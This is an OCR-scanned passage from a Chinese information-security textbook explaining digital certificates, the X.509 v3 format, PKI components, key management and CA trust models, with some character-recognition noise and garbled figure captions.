等 。 在 下 一 小 节 中 详细 介绍 。 


722 数字 证 书 


公 钥 需要 保证 完整 性 和 真实 性 , 像 电话 号 码 那样 直接 公开 的 方式 并 不 能 防止 别人 算 改 、 
冒充 、 伪 造 。 而 我 们 在 前 面 讲 到 保证 完整 性 和 真实 性 的 方法 之 一 就 是 数字 签名 。 假 设 我 们 
信任 一 个 实体 X, 所 有 的 公 钥 都 由 实体 X 验证 后 签名 存 人 某 个 数据 库 , 实 体 X 把 自己 的 公 
钥 公 开 。 则 每 取出 一 个 公 钥 时 用 户 都 验证 实体 X 的 签名 是 否 完整 ,从 而 可 以 发 现 对 公 钥 的 
算 改 。 进 一 步 , 如 果 将 用 户 的 标识 符 和 用 户 的 公 钥 联系 在 一 起 签名 , 则 可 以 防止 有 人 冒充 或 
者 伪造 公 钥 。 
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由 此 可 见 , 采 用 数字 签名 技术 可 以 确保 公 钥 的 安全 分 配 。 这 里 经 过 实体 X 签名 的 一 组 
信息 的 集合 被 称 为 证 书 , 而 可 信 的 实体 X 被 称 为 签证 机 构 (Certificate Authority,CA) 。 

证 书 是 一 个 数据 结构 ,是 一 种 由 一 个 可 信任 的 权威 机 构 签署 的 信息 集合 。 证 书 分 很 多 
种 类 型 ,例如 X. 509 公 钥 证 书 、 简 单 PKI 证 书 .PGP 证 书 、 属 性 证 书 等 。 

这 些 证 书 具有 各 自 不 同 的 格式 。 有 时 候 ,一 种 类 型 的 证 书 可 以 被 定义 为 好 几 种 不 同 的 
版 本 ,每 一 种 版 本 可 能 以 好 几 种 不 同 的 方式 来 具体 实现 。 例 如 ,安全 电子 交易 (SET) 证 书 就 
是 X. 509 版 本 3 的 公 钥 证 书 结合 专门 为 SET 交易 特别 扩展 而 成 的 。 

证 书 、 公 钥 证 书 、 数 字 证 书 这 几 个 概念 用 得 


比较 混乱 。 在 许多 场合 下 ,证 书 和 公 铀 证 书 都 是 让 必 
X. 509 公 钥 证 书 的 同义词 。 数 字 证 书 这 个 词 有 时 主体 身份 信息 | CA 名 称 
候 专门 来 强调 电子 形式 的 证 书 。 这 个 词 在 某 些 主体 的 公 角 ”| 其 他 信息 


环境 下 也 会 引起 混乱 ,因为 各 种 不 同类 型 的 证 书 
都 是 “数字 ”的 。 因 此 ,除非 这 个 词 被 专门 解释 说 
明 , 它 不 具有 任何 更 详细 的 专 有 意义 。 图 7-5 数字 证 书 示意 

一 个 简单 的 数字 证 书 示意 如 图 7-5 所 示 。 

公 钥 证 书包 含 持 证 主体 的 标识 公 钥 等 相关 信息 ,并 经 过 签证 机 构 施 加 数字 签名 保护 。 
任何 知道 签证 机 构 公 钥 的 人 都 可 以 验证 签名 的 真 伪 , 从 而 确保 公 钥 的 真实 性 、 确 保 公 钥 与 持 
证 主体 之 间 的 严格 绑 定 。 

日 常生 活 中 有 许多 使 用 证 书 的 例子 ,例如 汽车 的 驾驶 证 。 驾 驶 证 ( 公 钥 证 书 ) 确 认 了 轰 
驶 员 的 身份 (用 户 ) ,表示 其 开车 的 能 力 ( 公 钥 ) ,驾驶 证 上 有 公安 局 的 印章 (CA 对 证 书 的 签 
名 ) ,任何 人 只 要 信任 公安 局 (CA) ,就 可 以 信任 驾驶 证 ( 公 钥 证 书 ) 。 

有 了 公 钥 证 书 系统 后 ,如 果 某 个 用 户 需要 任何 其 他 已 向 CA 注册 的 用 户 的 公 钥 ,可 以 向 
持 证 人 (或 证 书 机 构 ) 直 接 索 取 其 公 钥 证 书 , 并 用 CA 的 公 钥 验证 CA 的 签名 ,从 而 获得 可 信 
的 公 钥 。 

由 于 公 钥 证 书 不 需要 保密 ,可 以 在 Internet 上 分 发 ,从 而 实现 公 钥 的 安全 分 配 。 有 了 签 
名 ,攻击 者 就 无 法 伪造 合法 的 公 钥 证 书 。 因 此 ,只 要 CA 是 可 信 的 , 公 钥 证 书 也 是 可 信和 的。 
其 中 CA 公 钥 的 获取 也 是 通过 证 书 方 式 进行 的 ,为 此 CA 也 为 自己 颁发 公 钥 证 书 。 

使 用 公 钥 证 书 的 主要 好 处 是 ,用 户 只 要 获取 了 CA 的 公 钥 ,就 可 以 安全 获取 其 他 用 户 的 
公 钥 。 因 此 公 钥 证 书 为 公 钥 的 分 发 商定 了 基础 ,成 为 公 钥 密码 在 大 型 网 络 系统 中 应 用 的 关 
键 技术 。 电 子 商务 .电子 政务 等 大 型 网 络 应 用 系统 都 采用 了 公 钥 证 书 技术 。 


CA 等 名 


723 X509 证 书 


目前 应 用 最 广泛 的 证 书 格式 是 国际 电信 联盟 (Internet Telecommunication Union， 
ITU) 提 出 的 X. 509 版 本 3 格式 。X. 509 是 由 ITU 制定 的 数字 证 书 标准 。 为 了 提供 公用 网 
络 用 户 目录 信息 服务 ,ITU 于 1988 年 制定 了 X. 500 系列 标准 。 其 中 X. 500 和 X. 509 是 安 
全 认证 系统 的 核心 ,X. 500 定义 了 一 种 区 别 命名 规则 ,以 命名 树 来 确保 用 户 名 称 的 唯一 性 ; 
X. 509 则 为 X. 500 用 户 名 称 提供 了 通信 实体 鉴别 机 制 ,并 规定 了 实体 鉴别 过 程 中 广泛 适用 
的 证 书 语法 和 数据 接口 ,X. 509 称 之 为 证 书 。 


最 初 的 X. 509 版 本 公布 于 1988 年 ,版 本 3 的 建议 稿 1994 年 公布 ,在 1995 年 获得 批准 。 
本 质 上 ,X. 509 证 书 由 用 户 公 钥 与 用 户 标识 符 组 成 ,此 外 还 包括 版 本 号 .证 书 序列 号 .CA 标 
识 符 、 签 名 算法 标识 、 签 发 者 名 称 .证 书 有 效 期 等 。 

X. 509 版 本 3 的 证 书 结构 如 图 7-6 所 示 。 


X. 509 证 书 


版 本 号 

证 书 序列 号 

签名 算法 标识 符 
颁发 者 名 称 

有 效 期 

主体 名 称 

主体 公 钥 信 息 ( 算 法 标识 , 公 钥 值 ) 
颁发 者 唯一 标识 符 (可 选 ) 
主体 者 唯一 标识 符 (可 选 ) 
扩展 项 (可 选 ) 
颁发 者 的 签名 


图 7-6 X. 509 证 书 结构 


(1) 版 本 号 : 识别 用 于 该 证 书 的 X. 509 标准 的 版 本 ,这 可 以 影响 证 书 中 所 能 指定 的 信 
息 。 迄 今 为 止 , 已 定义 的 版 本 有 三 个 。 

(2) 证 书 序列 号 : 发 放 证 书 的 实体 有 责任 为 证 书 指定 序列 号 ,以 使 其 区 别 于 该 实体 发 
放 的 其 他 证 书 。 此 信息 用 途 很 多 。 例 如 ,如 果 某 一 证 书 被 撤销 ,其 序列 号 将 放 到 证 书 撤销 清 
单 (CRL) 中 。 

(3) 签名 算法 标识 符 : 用 于 识别 CA 签 写 证 书 时 所 用 的 算法 。 

(4) 颁发 者 名 称 : 签 写 证 书 的 实体 的 可 识别 名 。 它 通常 为 一 个 CA。 使 用 该 证 书 意味 
着 信任 签 写 该 证 书 的 实体 (注意 ,有 些 情况 下 签 写 证 书 的 实体 还 要 签 写 自 己 的 证 书 ,例如 根 
或 顶层 CA 会 给 自己 签发 证 书 ) 。 

(5) 有 效 期 : 每 个 证 书 均 只 能 在 一 个 有 限 的 时 间 段 内 有 效 。 该 有 效 期 以 起 始 日 期 和 时 
间 及 终止 日 期 和 时 间 表 示 ,可 以 短 至 几 秘 或 长 至 一 世纪 。 所 选 有 效 期 取决 于 许多 因素 ,例如 
用 于 签 写 证 书 的 私 钥 的 使 用 频率 及 愿 为 证 书 支付 的 金钱 等 。 它 是 在 没有 危及 相关 私 钥 的 条 
件 下 ,实体 可 以 依赖 公 钥 的 预计 时 间 。 

(6) 主体 名 称 : 证 书 可 以 识别 其 公 钥 的 实体 名 。 此 名 称 使 用 X. 500 标准 ,因此 在 
Internet 中 应 是 唯一 的 。 此 字段 必须 是 非 空 的 .除非 在 扩展 项 中 使 用 了 其 他 的 名 字形 式 。 

(7) 主体 公 钥 信息 : 这 是 被 命名 实体 的 公 钥 ,同时 包括 指定 该 密 钥 所 属 公 钥 密码 系统 
的 算法 标识 符 及 所 有 相关 的 密 钥 参数 。 

(8) 颁发 者 唯一 标识 符 ( 可 选 ): 证 书 颁发 者 唯一 标识 符 ,属于 可 选 字段 。 该 字段 在 实 
际 中 很 少 使 用 ,并 且 不 被 RFC2459 推荐 使 用 。 

(9) 主体 唯一 标识 符 ( 可 选 ): 证 书 拥有 者 唯一 标识 符 , 属 于 可 选 字段 ,用 于 不 同 的 实体 
重用 这 一 证 书 时 标识 证 书 的 主体 ,该 字段 在 实际 中 很 少 使 用 ,并 且 不 被 RFC2459 推荐 使 用 。 

(10) 扩展 项 (可 选 ): 在 颁布 了 X. 509 版 本 2 后 ,人 们 认为 还 有 一 些 不 足 之 处 ,于 是 提 
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出 一 些 扩展 项 附 在 版 本 3 证 书 格式 的 后 面 。 这 些 扩 展 项 包括 密 钥 和 策略 信息 、 主 体 和 颁发 
者 属性 以 及 证 书 路 径 限 制 。 

(11) 颁发 者 的 签名 : 覆盖 了 证 书 的 所 有 其 他 字段 ,以 及 这 些 字段 被 CA 私 钥 加 密 后 的 
Hash 值 签名 算法 标识 等 。 


724 公 钥 基础 设施 PKI 


公 钥 证 书 .证书 管 理 机 构 ,证 书 管理 系统 、 围 绕 证 书 服务 的 各 种 软 硬 件 设备 以 及 相应 的 
法 律 基础 共同 组 成 公 钥 基础 设施 PKI(Public Key Infrastructure)。 公 钥 基 础 设施 提供 一 系 
列 支 持 公 钥 密码 应 用 (加 密 、 解 密 、 签 名 与 验证 ) 的 基础 服务 。 本 质 上 ,PKI 是 一 种 标准 的 公 
钥 密 码 的 密 钥 管理 平台 。 

PKI 和 采用 证 书 进行 公 钥 管理 ,通过 第 三 方 的 可 信任 机 构 (CA) ,把 用 户 的 公 钥 和 用 户 的 
其 他 标识 信息 捆绑 在 一 起 ,其 中 包括 用 户 名 和 电子 邮件 地 址 等 信息 ,以 在 Internet 网 上 验证 
用 户 的 身份 。 

因此 ,从 大 的 方面 来 说 ,所 有 提供 公 钥 加 密 和 数字 签名 服务 的 系统 ,都 可 归结 为 PKI 系 
统 的 一 部 分 ,PKI 的 主要 目的 是 通过 自动 管理 密 钥 和 证 书 ,为 用 户 建立 起 一 个 安全 的 网 络 运 
行 环境 ,使 用 户 可 以 在 多 种 应 用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 ,从 而 保证 网 上 数据 
的 机 密 性 \ 完 整 性 有 效 性 。 

一 个 简单 的 PKI 构成 如 图 7-7 所 示 。 


R= 
证 书库 


证 书 颁发 机 构 


密 钥 服务 器 


注册 认证 机 构 
图 7-7 PKI 的 基本 构成 


简单 的 PKI 系统 包括 证 书 机 构 CA、 注 册 机 构 RA 和 相应 的 PKI 存储 库 。CA 用 于 签 
发 并 管理 证 书 ; RA 可 作为 CA 的 一 部 分 ,也 可 以 独立 ,其 功能 包括 个 人 身份 审核 .CRL( 证 
书 撤销 列表 ) 管 理 、 密 钥 产 生 和 密 钥 备份 等 ; PKI 存储 库 包括 LDAP 目录 服务 器 和 普通 数据 
库 , 用 于 对 用 户 申 请 、 证 书 、 密 钥 `.CRL 和 日 志 等 信息 进行 存储 和 管理 ,并 提供 一 定 的 查询 
功能 。 

一 个 有 效 的 PKI 系统 必须 是 安全 的 和 透明 的 ,用 户 在 获得 加 密 和 数字 签名 服务 时 ,不 
需要 详细 地 了 解 PKI 的 内 部 运作 机 制 。 在 一 个 典型 .完整 和 有 效 的 PKI 系统 应 该 包含 证 书 
的 创建 和 发 布 以 及 证 书 的 撤销 ,一 个 可 用 的 PKI 产 品 还 必须 提供 相应 的 密 钥 管理 服务 , 包 
括 密 钥 的 备份 恢复 和 更 新 等 。 没 有 一 个 好 的 密 钥 管理 系统 ,将 极 大 影响 一 个 PKI 系统 的 
规模 、 可 伸缩 性 和 在 协同 网 络 中 的 运行 成 本 。 
美国 是 最 早 推动 PKI 建设 的 国家 , 早 在 1996 年 就 成 立 了 联邦 PKI 指导 委员 会 。 目 前 
美国 联邦 政府 、 州 政府 、 大 型 企业 都 建立 了 PKI。 比 较 有 代表 性 的 主要 有 VeriSign 和 


责 


Entrust。VeriSign 作为 RSA 的 控股 公司 ,借助 RSA 成 熟 的 安全 技术 ,提供 了 PKI 产 品 ,为 
用 户 之 间 的 内 部 信息 交互 提供 安全 保障 。 另 外 ,VeriSign 也 提供 对 外 的 CA 服务 ,包括 证 书 
的 发 布 和 管理 等 功能 ,并 且 同 一 些 大 的 生产 商 ,如 Microsoft、Netscape 和 JavaSoft 等 ,保持 
了 伙伴 关系 ,以 在 Internet 上 提供 代码 签名 服务 。 

1998 年 中 国 的 电信 行业 也 建立 了 国内 第 一 个 行业 CA ,此 后 金融 、 工 商 \ 外 贸 、 海 关 和 一 
些 省 市 也 建立 了 自己 的 行业 CA 和 地 方 CA。PKI 已 经 成 为 世界 各 国 发 展 电子 商务 .电子 政 
务 .电子 金融 的 基础 设施 。 


1. PKI 的 逻辑 结构 


PKI 作为 一 组 在 分 布 式 计算 系统 中 利用 公 钥 技术 和 X. 509 证 书 所 提供 的 安全 服务 , 企 
业 或 组 织 可 利用 相关 产品 建立 安全 域 ,并 在 其 中 发 布 密 钥 和 证 书 。 在 安全 域内 ,PKI 管理 加 
密 密 钥 和 证 书 的 发 布 ,并 提供 诸如 密 钥 管 理 (包括 密 钥 更 新 , 密 钥 恢复 和 密 钥 委 托 等 ). 证 书 
管理 (包括 证 书 产生 和 撤销 等 ) 和 策略 管理 等 。 

PKI 产品 也 允许 一 个 组 织 通过 证 书 认 证 的 方式 来 同 其 他 安全 域 建立 信任 关系 。 这 些 服 
务 和 信任 关系 不 能 局 限于 独立 的 网 络 之 内 ,而 应 建立 在 网 络 之 间 和 Internet 之 上 ,为 电子 商 
务 和 网 络 通信 提供 安全 保障 ,所 以 具有 互 操作 性 的 结构 化 和 标准 化 技术 成 为 PKI 的 核心 。 

PKI 在 实际 应 用 上 是 一 套 软 硬 件 系统 和 安全 策略 的 集合 , 它 提供 了 一 整套 安全 机 制 , 使 
用 户 在 不 知道 对 方 身份 或 分 布地 很 广 的 情况 下 ,以 证 书 为 基础 ,通过 一 系列 的 信任 关系 进行 
通信 和 电子 商务 交易 。 

一 个 典型 的 PKI 的 逻辑 结构 如 图 7-8 所 示 , 其 中 包括 PKI 策略 、 软 硬件 系统 、 证 书 机 构 
CA ,注册 机 构 RA .证 书 发 布 系统 和 PKI 应 用 等 。 


PKI 应 用 


图 7-8 PKI 的 逻辑 结构 


(1) PKI 安 全 策略 : 建立 和 定义 了 一 个 组 织 信息 安全 方面 的 指导 方针 ,同时 也 定义 了 
密码 系统 使 用 的 处 理 方法 和 原则 。 

(2) 证 书 机 构 CA: 是 PKI 的 信任 基础 , 它 管理 公 钥 的 整个 生命 周期 ,其 作用 包括 发 放 
证 书 ,规定 证 书 的 有 效 期 和 通过 发 布 证 书 撤销 列表 ,确保 必要 时 可 以 废除 证 书 。 

(3) 注册 机 构 RA: 提供 用 户 和 CA 之 间 的 一 个 接口 , 它 获取 并 认证 用 户 的 身份 ,向 CA 
提出 证 书 请 求 。 它 主要 完成 收集 用 户 信息 和 确认 用 户 身份 的 功能 。 这 里 的 用 户 , 是 指 将 要 
向 认证 中 心 CA 申请 数字 证 书 的 客户 ,可 以 是 个 人 ,也 可 以 是 集团 或 团体 、 某 政府 机 构 等 。 

(4) 证 书 发 布 系统 : 负责 证 书 的 发 放 , 如 可 以 通过 用 户 自 己 ,或 是 通过 目录 服务 。 目 录 
服务 器 可 以 是 一 个 组 织 中 现存 的 ,也 可 以 是 PKI 方 案 中 提供 的 。 
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(5) 数字 证 书 : 在 PKI 中 ,最 重要 的 信息 就 是 数字 证 书 ,可 是 说 ,PKI 的 所 有 的 活动 都 
是 围绕 数字 证 书 来 进行 的 。 

(6) PKI 应 用 : PKI 的 应 用 范围 非常 广泛 ,并且 在 不 断 发 展 之 中 ,可 以 说 只 要 需要 使 用 
到 公 钥 的 地 方 就 要 使 用 到 PKI, 例 如 安全 电子 邮件 .Web 安全 、 虚 拟 专用 网 等 。 


2. 证 书 的 存放 


数字 证 书 作 为 一 种 电子 数据 格式 ,可 以 直接 从 网 上 下 载 ,也 可 以 通过 其 他 方式 来 存放 。 

可 以 使 用 IC 卡 来 存放 用 户 证 书 。 即 把 用 户 的 数字 证 书写 到 IC 卡 中 ,供用 户 随身 携带 。 
这 样 用 户 在 所 有 能 够 读 IC 卡 证 书 的 电子 商务 终端 上 都 可 以 享受 安全 电子 商务 服务 。 

用 户 证 书 也 可 以 直接 存放 在 磁盘 或 自己 的 终端 上 。 用 户 将 从 CA 申请 的 证 书 通过 下 载 
或 复制 到 磁盘 或 自己 的 PC 或 智能 终端 上 , 当 用 户 使 用 自己 的 终端 享受 电子 商务 服务 时 , 直 
接 从 终端 读 入 即 可 。 

另外 ,CRL 一 般 通过 网 上 下 载 的 方式 存储 在 用 户 端 。 


3. 证 书 的 申请 和 撤销 


证 书 的 申请 有 两 种 方式 ,一 是 在 线 申请 ,另外 一 个 就 是 离线 申请 。 在 线 申 请 就 是 通过 浏 
览 器 或 其 他 应 用 系统 通过 在 线 的 方式 来 申请 证 书 , 这 种 方式 一 般 用 于 申请 普通 用 户 证 书 或 
测试 证 书 。 离 线 方式 一 般 通 过 人 工 的 方式 直接 到 证 书 机 构 的 受理 点 去 办 理 证 书 申请 手续 ， 
通过 审核 后 获取 证 书 , 这 种 方式 一 般 用 于 比较 重要 的 场合 ,如 服务 器 证 书 和 商家 证 书 等 。 

证 书 的 撤销 涉及 CRL 的 管理 。 用 户 向 特定 的 操作 员 ( 仅 负责 CRL 的 管理 ) 发 一 份 加 密 
签名 的 邮件 ,申明 自己 希望 撤销 证 书 。 操 作 员 打 开 邮 件 ,填写 CRL 注册 表 , 并 且 进 行 数字 签 
名 ,提交 给 CA,CA 操作 员 验 证 注册 机 构 操 作 员 的 数字 签名 ,批准 用 户 撤销 证 书 , 并 且 更 新 
CRL, 然 后 CA 将 不 同 格式 的 CRL 输出 给 注册 机 构 , 公 布 到 安全 服务 器 上 ,这样 其 他 人 可 以 
通过 访问 服务 器 得 到 CRL。 

在 一 个 PKI 中 ,特别 是 CA 中 ,信息 的 存储 是 一 个 非常 核心 的 问题 , 它 包括 两 个 方面 : 
一 是 CA 服务 器 利用 数据 库 来 备份 当前 密 钥 和 归档 过 期 密 钥 , 该 数据 库 需 高 度 安全 和 机 密 ， 
其 安全 等 级 同 CA 本 身 相 同 ; 另外 一 个 就 是 目录 服务 器 ,用 于 分 发 证 书 和 CRL ,一 般 采用 
LDAP 目录 服务 器 。 


4. PKI 密 钥 管 理 


密 钥 管理 也 是 PKI( 主 要 指 CA) 中 的 一 个 核心 问题 ,主要 是 指 密 钥 对 的 安全 管理 ,包括 
密 钥 产生 、 密 钥 备份 . 密 钥 恢复 和 密 钥 更 新 等 。 

1) 密 钥 产生 

密 钥 对 的 产生 是 证 书 申请 过 程 中 重要 的 一 步 , 其 中 产生 的 私 钥 由 用 户 保留 , 公 钥 和 其 他 
信息 则 交 给 CA 中 心 进行 签名 ,从 而 产生 证 书 。 根 据 证 书 类 型 和 应 用 的 不 同 , 密 钥 对 的 产生 
也 有 不 同 的 形式 和 方法 。 对 普通 证 书 和 测试 证 书 ,一般 由 浏览 器 或 固定 的 终端 应 用 来 产生 ， 
这 样 产 生 的 密 钥 强 度 较 小 ,不 适合 应 用 于 比较 重要 的 安全 网 络 交 易 。 而 对 于 比较 重要 的 证 
书 , 如 商家 证 书 和 服务 器 证 书 等 , 密 钥 对 一 般 由 专用 应 用 程序 或 CA 中 心 直 接 产生 ,这 样 产 
生 的 密 钥 强 度 大 ,适合 于 重要 的 应 用 场合 。 


另外 ,根据 密 钥 的 应 用 不 同 , 也 可 能 会 有 不 同 的 产生 方式 。 比 如 签名 密 钥 可 能 在 客户 端 
或 RA 中 心 产生 ,而 加 密 密 钥 则 需要 在 CA 中 心 直 接 产生 。 

2) 密 钥 备 份 和 恢复 

在 一 个 PKI 系统 中 ,维护 密 钥 对 的 备份 至 关 重 要 ,如 果 没 有 这 种 措施 , 当 密 钥 丢 失 后 ， 
将 意味 着 加 密 数据 的 完全 丢失 ,对 于 一 些 重要 数据 ,这 将 是 灾难 性 的 。 所 以 , 密 钥 的 备份 和 
恢复 也 是 PKI 密 钥 管理 中 的 重要 一 环 。 

使 用 PKI 的 企业 和 组 织 必须 能 够 得 到 确认 : 即使 密 钥 丢失 , 受 密 钥 加 密 保护 的 重要 信息 
也 必须 能 够 恢复 ,并 且 不 能 让 一 个 独立 的 个 人 完全 控制 最 重要 的 主 密 钥 , 否 则 将 引起 严重 后 果 。 

企业 级 的 PKI 产品 至 少 应 该 支持 用 于 加 密 的 安全 密 钥 的 存储 、 备 份 和 人 恢复 。 密 钥 一 般 
用 口令 进行 保护 ,而 口令 丢失 则 是 管理 员 最 常见 的 安全 玖 漏 之 一 。 所 以 ,PKI 产品 应 该 能 够 
备份 密 钥 , 即 使 口令 丢失 , 它 也 能 够 让 用 户 在 一 定 条 件 下 恢复 该 密 钥 ,并 设置 新 的 口令 。 

另外 ,使 用 PKI 的 企业 也 应 该 考虑 所 使 用 密 钥 的 生命 周期 , 它 包 括 密 钥 和 证 书 的 有 效 
时 间 , 以 及 已 撤销 密 钥 和 证 书 的 维护 时 间 等 。 

3) 密 钥 更 新 

每 一 个 由 CA 颁发 的 证 书 都 会 有 有 效 期 , 密 钥 对 生命 周期 的 长 短 由 签发 证 书 的 CA 中 
心 来 确定 ,各 CA 系统 的 证 书 有 效 期 限 有 所 不 同 ,一 般 大 约 为 2 一 3 年 。 

当 用 户 的 私 钥 被 泄露 或 证 书 的 有 效 期 快 到 时 ,用 户 应 该 更 新 私 钥 。 这 时 用 户 可 以 废除 
证 书 ,产生 新 的 密 钥 对 ,或 者 申请 新 的 证 书 。 


5. 证 书 的 使 用 


在 实际 应 用 中 ,为 了 验证 信息 的 数字 签名 ,用 户 首先 必须 获取 信息 发 送 者 的 公 钥 证 书 ， 
以 及 一 些 额 外 需要 的 证 书 (如 CA 证 书 等 ,用 于 验证 发 送 者 证 书 的 有 效 性 ) 。 

证 书 的 获取 可 以 有 多 种 方式 ,如 发 送 者 发 送 签名 信息 时 附加 发 送 自己 的 证 书 , 或 以 另外 
的 单独 信息 发 送 证 书 , 或 者 可 以 通过 访问 证 书 发 布 的 目录 服务 器 来 获得 ,或 者 直接 从 证 书 相 
关 的 实体 处 获得 。 在 一 个 PKI 体系 中 ,可 以 采取 某 种 或 某 几 种 上 述 方式 获得 证 书 。 

在 电子 商务 系统 中 ,证 书 的 持 有 者 可 以 是 个 人 用 户 、 企 事业 单位 商家、 银行 等 。 无 论 是 
电子 商务 中 的 哪 一 方 ,在 使 用 证 书 验证 数据 时 ,都 遵循 同样 的 验证 流程 。 一 个 完整 的 验证 过 
程 有 以 下 几 步 ， 

(1) 验证 者 将 客户 端 发 来 的 数据 解密 。 

(2) 将 解密 后 的 数据 分 解 成 原始 数据 .签名 数据 和 客户 证 书 三 部 分 。 

(3) 用 CA 根 证 书 (CA 的 公 钥 ) 验 证 客户 证 书 的 签名 完整 性 。 

(4) 检查 客户 证 书 是 否 有 效 〈 当 前 时 间 在 证 书 结构 中 的 所 定义 的 有 效 期 内 ) 。 

(5) 检查 客户 证 书 是 否 作废 。 

(6) 验证 客户 证 书 结构 中 的 证 书 用 途 。 

(7) 用 客户 的 证 书 (客户 的 公 钥 ) 验 证 原始 数据 的 签名 完整 性 。 

如 果 以 上 各 项 均 验 证 通过 , 则 接受 该 数据 。 


6. PKI 的 信任 模型 
建立 一 个 管理 全 世界 所 有 用 户 的 全 球 性 PKI 是 不 现实 的 。 比 较 可 行 的 办 法 是 各 个 国 
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家 建立 自己 的 PKI, 一 个 国家 之 内 再 建立 不 同行 业 或 者 不 同 地 区 的 PKI。 但 是 为 了 实现 路 
地 区 ,跨行 业 甚至 跨国 际 的 电子 安全 业务 ,这些 不 同 的 PKI 之 间 互 连 互通 和 互相 信任 是 不 
可 避免 的 。 

对 于 大 范围 的 PKI, 一 个 CA 也 是 不 现实 的 ,往往 需要 多 个 CA。 这 些 CA 之 间 应 该 具 
有 某 种 结构 关系 ,以 使 不 同 CA 之 间 的 证 书 认证 简单 方便 。 

证 书 用 户 ,证 书 主体 、 各 个 CA 之 间 的 证 书 认证 关系 称 为 PKI 的 信任 模型 。 人 们 目前 
已 经 提出 了 多 种 信任 模型 。 

1) CA 的 严格 层次 模型 

在 这 个 结构 中 , 根 CA 把 自己 的 权力 授 给 多 个 子 CA ,这些 子 CA 再 将 它们 的 权力 授 给 
它们 的 子 CA ,这 个 过 程 直 至 某 个 CA 实际 颁发 了 证 书 。 

CA 的 严格 层次 模型 如 图 7-9 所 示 , 像 一 棵 倒置 的 树 。 每 个 实体 (包括 CA 和 终端 用 户 ) 
都 信任 根 CA, 因 此 都 必须 拥有 根 CA 的 公 钥 。 


用 户 用 户 用 户 用 户 用 户 


图 7-9 CA 的 严格 层次 模型 


在 这 个 模型 中 ,层次 结构 中 所 有 实体 都 信任 唯一 的 根 CA。 这 个 层次 结构 按照 如 下 规 
则 建立 : 

(1) 根 CA 认证 (为 其 创建 和 签署 证 书 ) 直 接 在 它 下 面 的 CA。 

(2) 这 些 CA 中 的 每 一 个 都 认证 零 个 或 者 多 个 直接 在 它 下 面 的 CA。 

(3) 倒数 第 二 层 的 CA 认证 终端 实体 。 

一 个 持 有 一 份 可 信 的 根 CA 公 钥 的 终端 实体 A 可 以 通过 如 下 方法 检验 另 一 个 终端 实 
体 B 的 证 书 。 

假设 B 的 证 书 由 子 CA; 签发 ( 公 钥 为 k;), 子 CA; 的 证 书 由 子 CA;( 公 钥 为 心 ) 签 发 , 子 
CAs 的 证 书 由 子 CA1( 公 钥 为 有 ) 签 发 , 子 CA; 的 证 书 由 根 CA 签发 ( 公 钥 为 k)。 拥 有 上 的 
终端 实体 A 可 以 利用 来 验证 子 CA 的 公 钥 ,然后 利用 来 验证 子 CA, 的 公 钥 忆 ,再 
利用 ks 来 验证 子 CAs 的 公 钥 @ ,最终 利用 ks 来 验证 B 的 证 书 。 

2) CA 分 布 式 信任 结构 

分 布 式 信任 结构 把 信任 分 散 到 两 个 或 者 更 多 个 CA 上 。 

采用 严格 层次 结构 的 PKI 系统 往往 在 一 个 企业 或 者 部 门 实施 。 为 了 将 这 些 PKI 系统 
互 连 起 来 ,可 以 采用 下 列 两 种 方式 建立 : 

(1) 中 心 辐射 配置 : 在 这 种 配置 中 ,有 一 个 中 心地 位 的 CA, 每 个 根 CA 都 和 这 个 中 心 
CA 进行 交叉 认证 。 

(2) 网 状 配置 : 所 有 根 CA 之 间 进 行 交叉 认证 。 


在 分 布 式 信任 结构 的 中 心 辐射 配置 中 ,中 心 CA 并 不 能 被 看 做 是 根 CA, 如 图 7-10 所 
示 ,在 这 个 结构 中 ,可 能 有 多 个 根 CA ,每 个 实体 都 信任 自己 的 根 CA, 他 们 只 拥有 自己 根 CA 
的 公 
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图 7-10 CA 分 布 式 信任 结构 的 中 心 辐射 配置 


一 个 终端 实体 A 可 以 如 下 检验 另 一 个 终端 实体 B 的 证 书 。 如 果 他 们 拥有 同一 个 根 CA 
的 公 钥 ,认证 过 程 和 前 面 的 严格 层次 结构 一 样 。 否 则 ,A 可 以 利用 自己 根 CA 的 公 钥 来 验证 
中 心 CA 的 公 钥 ,然后 利用 中 心 CA 的 公 钥 来 验证 B 的 根 CA 的 公 钥 ,再 利用 B 的 根 CA 的 
公 钥 向 下 验证 ,直至 验证 终端 实体 B 的 证 书 。 

3) Web 模型 

Web 模型 依赖 于 浏览 器 ,如 Internet Explorer 或 者 FireFox。 这 种 模型 将 一 些 CA 的 
公 钥 预 装 在 使 用 的 浏览 器 上 ,这 些 公 钥 确定 了 一 组 CA ,浏览 器 的 用 户 最 初 信任 这 些 CA 并 
把 它们 作为 根 CA。 

这 些 根 CA 是 通过 物理 嵌入 软件 来 发 布 的 ,这 样 就 将 CA 的 名 字 和 它 的 公 钥 安全 绑 定 。 

图 7-11 是 预 安装 在 IE 浏览 器 中 各 CA 的 公 钥 证 书 , 可 以 通过 IE 浏览 器 中 的 “工具 一 
Internet 选项 一 内 容 一 证 书 查 看 。 


[ET TREE 好 记 的 名 得 
Nibaba con Co. Alibaba com Corp... 2011-2-22 

国 Glovalsin Roo... Root SGC Authority 。 2014-1-28 

国 erg CyberTrust... Root SGC Authority 2006-2-23 

国 iTruschina Cla .. Class 2 Public PF... 2004-1-7 

国 iTruschina CH iTruschina CH Ro... 2006-10-1 

国 iTruschina CN iTruschina CH Ro. 2006-10-1 

国 iTruschina CH .. iTruschins CH Ro... 2006-10-1 

国 iTruschina CH iTruschina CN Re... 2006-10-1 

Fwi rosnft Wind MMirrnsnft Rnnt A Fnnp-1 


导入 QD... | 号 出 EE) 烛 际 面 / | 
证 书 的 预期 目的 


图 7-11 安装 在 正 浏 览 器 中 的 CA 公 钥 证 书 
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选中 某 一 个 证 书 , 单 击 “ 高 级 ”按钮 ,可 以 看 到 该 证 书 的 各 项 属性 ,如 图 7-12 所 示 。 


这 个 证 书 的 目的 如 下 - 
* 保护 电子 邮件 消息 
* 保证 远程 计算 机 的 身份 
“* 所 有 发 布 策略 


健 发 给 : 。 Certisign Autoridade Certificadora AMC1S 
颁发 者 : Certisign Antoridade Certificadora AC1S 


有 效 和 起 始 日 期 1999-6-27 到 2016-6-27 


焕发 者 膏 明 (BE) 


图 7-12 显示 证 书 的 属性 


4) 以 用 户 为 中 心 的 信任 模型 
在 以 用 户 为 中 心 的 认证 模型 中 ,每 个 用 户 都 决定 信赖 或 拒绝 哪个 证 书 。 最 初 可 信 的 密 
钥 集 可 能 只 有 朋友 、 家 人 和 同事 等 ,如 图 7-13 所 示 。 


Alice 的 同 Alice 的 哥哥 =-=| David 
Alice 的 朋友 | Bob 


